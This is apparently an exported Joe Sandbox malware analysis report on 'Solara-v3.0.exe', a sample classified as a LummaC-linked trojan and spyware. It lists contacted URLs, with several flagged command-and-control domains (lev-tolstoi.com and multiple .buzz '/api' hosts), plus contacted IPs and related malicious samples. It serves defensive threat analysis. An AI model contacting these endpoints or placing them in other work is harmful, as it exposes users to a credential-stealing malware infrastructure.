                                                                                                          https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073106626.0000000003332000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://community.fastly.steamstatic.com/Solara-v3.0.exe, 00000004.00000003.2073106626.0000000003332000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://steam.tv/Solara-v3.0.exe, 00000004.00000003.2073106626.0000000003332000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://lev-tolstoi.com/apiinhpmnjffcofjonbfbgaocSolara-v3.0.exe, 00000004.00000003.2257643086.000000000336F000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2279754011.000000000336A000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000002.3287461223.000000000336F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: malware
                                                                                                                		unknown
                                                                                                                https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=enSolara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://scentniej.buzz/api0Solara-v3.0.exe, 00000004.00000003.2094598295.00000000032FB000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2117296119.00000000032F9000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2117409999.00000000032FB000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094482901.00000000032F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: malware
                                                                                                                  		unknown
                                                                                                                  http://www.entrust.net/rpa03Solara-v3.0.exefalse
                                                                                                                    		high
                                                                                                                    https://lev-tolstoi.com/Solara-v3.0.exe, 00000004.00000003.2073106626.0000000003332000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2880061716.0000000005A9D000.00000004.00000800.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2117482449.0000000003331000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2279860788.0000000003388000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://store.steampowered.com/privacy_agreement/Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094482901.00000000032DA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://community.fastly.steamstatic.comSolara-v3.0.exe, 00000004.00000003.2094435929.0000000003332000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094598295.0000000003332000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2117409999.0000000003320000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2117482449.0000000003331000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://store.steampowered.com/points/shop/Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Solara-v3.0.exe, 00000004.00000003.2118247184.0000000005A59000.00000004.00000800.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2118198895.0000000005A5C000.00000004.00000800.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2118406859.0000000005A59000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://crl.rootca1.amazontrust.com/rootca1.crl0Solara-v3.0.exe, 00000004.00000003.2169079232.0000000005AD6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://ocsp.rootca1.amazontrust.com0:Solara-v3.0.exe, 00000004.00000003.2169079232.0000000005AD6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&aSolara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://sketchfab.comSolara-v3.0.exe, 00000004.00000003.2073106626.0000000003332000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://www.ecosia.org/newtab/Solara-v3.0.exe, 00000004.00000003.2118247184.0000000005A59000.00000004.00000800.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2118198895.0000000005A5C000.00000004.00000800.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2118406859.0000000005A59000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://lv.queniujq.cnSolara-v3.0.exe, 00000004.00000003.2073106626.0000000003332000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://steamcommunity.com/profiles/76561199724331900/inventory/Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brSolara-v3.0.exe, 00000004.00000003.2169895889.0000000005D4B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://www.youtube.com/Solara-v3.0.exe, 00000004.00000003.2073106626.0000000003332000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://store.steampowered.com/privacy_agreement/Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=engSolara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&amSolara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://www.google.com/recaptcha/Solara-v3.0.exe, 00000004.00000003.2073106626.0000000003332000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://checkout.steampowered.com/Solara-v3.0.exe, 00000004.00000003.2073106626.0000000003332000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://inherineau.buzz/apiSolara-v3.0.exe, 00000004.00000003.2094598295.00000000032FB000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094482901.00000000032F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                          		unknown
                                                                                                                                                          https://appliacnesot.buzz/apiSolara-v3.0.exe, 00000004.00000003.2094598295.00000000032FB000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2117296119.00000000032F9000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2117409999.00000000032FB000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094482901.00000000032F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                          		unknown
                                                                                                                                                          http://crl.entrust.net/2048ca.crl0Solara-v3.0.exefalse
                                                                                                                                                            		high
                                                                                                                                                            https://lev-tolstoi.com/apiifaf)Solara-v3.0.exe, 00000004.00000003.2193726868.000000000336E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                            		unknown
                                                                                                                                                            https://store.steampowered.com/;Solara-v3.0.exe, 00000004.00000003.2073106626.0000000003332000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://www.entrust.net/rpa0Solara-v3.0.exefalse
                                                                                                                                                                		high
                                                                                                                                                                https://store.steampowered.com/about/Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://steamcommunity.com/my/wishlist/Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://cashfuzysao.buzz/apiBSolara-v3.0.exe, 00000004.00000003.2094598295.00000000032FB000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2117296119.00000000032F9000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2117409999.00000000032FB000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094482901.00000000032F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                                                    		unknown
                                                                                                                                                                    https://lev-tolstoi.coSolara-v3.0.exe, 00000004.00000003.2220043538.00000000032FB000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2215763251.00000000032F9000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2193850105.00000000032FB000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2219935945.00000000032F9000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2193758527.00000000032F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                    		unknown
                                                                                                                                                                    https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      http://ocsp.entrust.net03Solara-v3.0.exefalse
                                                                                                                                                                        		high
                                                                                                                                                                        http://ocsp.entrust.net02Solara-v3.0.exefalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://help.steampowered.com/en/Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://steamcommunity.com/market/Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://store.steampowered.com/news/Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Solara-v3.0.exe, 00000004.00000003.2118247184.0000000005A59000.00000004.00000800.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2118198895.0000000005A5C000.00000004.00000800.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2118406859.0000000005A59000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  http://store.steampowered.com/subscriber_agreement/Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094482901.00000000032DA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgSolara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094482901.00000000032DA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://recaptcha.net/recaptcha/;Solara-v3.0.exe, 00000004.00000003.2073106626.0000000003332000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        https://community.fastly.steamstatic.com/public/css/gSolara-v3.0.exe, 00000004.00000003.2094435929.0000000003332000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094598295.0000000003332000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2117409999.0000000003320000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2117482449.0000000003331000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          https://steamcommunity.com/discussions/Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            https://hummskitnj.buzz/apiSolara-v3.0.exe, 00000004.00000003.2220043538.00000000032FB000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2215763251.00000000032F9000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094598295.00000000032FB000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2193850105.00000000032FB000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2117296119.00000000032F9000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2117409999.00000000032FB000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094482901.00000000032F9000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2219935945.00000000032F9000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2193758527.00000000032F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                            		unknown
                                                                                                                                                                                            https://store.steampowered.com/stats/Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&amSolara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                https://medal.tvSolara-v3.0.exe, 00000004.00000003.2073106626.0000000003332000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  https://broadcast.st.dl.eccdnx.comSolara-v3.0.exe, 00000004.00000003.2073106626.0000000003332000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngSolara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      https://lev-tolstoi.com/api2Y61Solara-v3.0.exe, 00000004.00000003.2168563080.0000000005A22000.00000004.00000800.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2169156073.0000000005A22000.00000004.00000800.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2168880871.0000000005A23000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      • Avira URL Cloud: malware
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&aSolara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        https://store.steampowered.com/steam_refunds/Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          http://x1.c.lencr.org/0Solara-v3.0.exe, 00000004.00000003.2169079232.0000000005AD6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            http://x1.i.lencr.org/0Solara-v3.0.exe, 00000004.00000003.2169079232.0000000005AD6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		high
                                                                                                                                                                                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchSolara-v3.0.exe, 00000004.00000003.2118247184.0000000005A59000.00000004.00000800.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2118198895.0000000005A5C000.00000004.00000800.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2118406859.0000000005A59000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                		high
                                                                                                                                                                                                                https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&aSolara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094482901.00000000032DA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                  https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                    https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                      https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=eSolara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        		high

                                                                                                                                                                                                                        World Map of Contacted IPs

                                                                                                                                                                                                                        • No. of IPs < 25%
                                                                                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                                                                                        • 75% < No. of IPs

                                                                                                                                                                                                                        Public IPs

                                                                                                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                        104.21.66.86
                                                                                                                                                                                                                        		lev-tolstoi.comUnited States
                                                                                                                                                                                                                        		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                        23.55.153.106
                                                                                                                                                                                                                        		steamcommunity.comUnited States
                                                                                                                                                                                                                        		20940AKAMAI-ASN1EUfalse

                                                                                                                                                                                                                        General Information

                                                                                                                                                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                        Analysis ID:1581538
                                                                                                                                                                                                                        Start date and time:2024-12-28 02:54:05 +01:00
                                                                                                                                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                        Overall analysis duration:0h 4m 54s
                                                                                                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                        Report type:full
                                                                                                                                                                                                                        Cookbook file name:default.jbs
                                                                                                                                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                        Number of analysed new started processes analysed:7
                                                                                                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                                                                                        Number of injected processes analysed:0
                                                                                                                                                                                                                        Technologies:
                                                                                                                                                                                                                        • HCA enabled
                                                                                                                                                                                                                        • EGA enabled
                                                                                                                                                                                                                        • AMSI enabled
                                                                                                                                                                                                                        Analysis Mode:default
                                                                                                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                                                                                                        Sample name:Solara-v3.0.exe
                                                                                                                                                                                                                        Detection:MAL
                                                                                                                                                                                                                        Classification:mal100.troj.spyw.evad.winEXE@6/1@11/2
                                                                                                                                                                                                                        EGA Information:
                                                                                                                                                                                                                        • Successful, ratio: 66.7%
                                                                                                                                                                                                                        HCA Information:
                                                                                                                                                                                                                        • Successful, ratio: 94%
                                                                                                                                                                                                                        • Number of executed functions: 62
                                                                                                                                                                                                                        • Number of non-executed functions: 169
                                                                                                                                                                                                                        Cookbook Comments:
                                                                                                                                                                                                                        • Found application associated with file extension: .exe

                                                                                                                                                                                                                        Warnings

                                                                                                                                                                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                                                                                                                                        • Excluded IPs from analysis (whitelisted): 13.107.246.63, 20.109.210.53
                                                                                                                                                                                                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                        • Execution Graph export aborted for target Solara-v3.0.exe, PID 6568 because there are no executed function
                                                                                                                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                                                                                                        Simulations

                                                                                                                                                                                                                        Behavior and APIs

                                                                                                                                                                                                                        TimeTypeDescription
                                                                                                                                                                                                                        20:54:55API Interceptor11x Sleep call for process: Solara-v3.0.exe modified

                                                                                                                                                                                                                        Joe Sandbox View / Context

                                                                                                                                                                                                                        IPs

                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                        104.21.66.86MV ROCKET_PDA.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                        • www.ayushigangwar.com/nqn4/?CJBlp=0Brh6Vr8UbBX&T2MpwT=59bmqUDXor7TXV4b71NCQ0d0nCVif23i1yH5+9ZmJc5hgCU7y+ZN9z0btTsWzGv6OrGw
                                                                                                                                                                                                                        23.55.153.106Script.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          Neverlose.cc-unpadded.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                            Aura.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                              Aura.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                Installer.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                  Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    w22319us3M.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                                      T4qO1i2Jav.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                        FXdg37pY22.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                          FXdg37pY22.exeGet hashmaliciousLummaC StealerBrowse

                                                                                                                                                                                                                                            Domains

                                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                            lev-tolstoi.comScript.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.21.66.86
                                                                                                                                                                                                                                            Aura.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.21.66.86
                                                                                                                                                                                                                                            Installer.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.21.66.86
                                                                                                                                                                                                                                            SoftWare(1).exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.21.66.86
                                                                                                                                                                                                                                            ForcesLangi.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.21.66.86
                                                                                                                                                                                                                                            Leside-.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.21.66.86
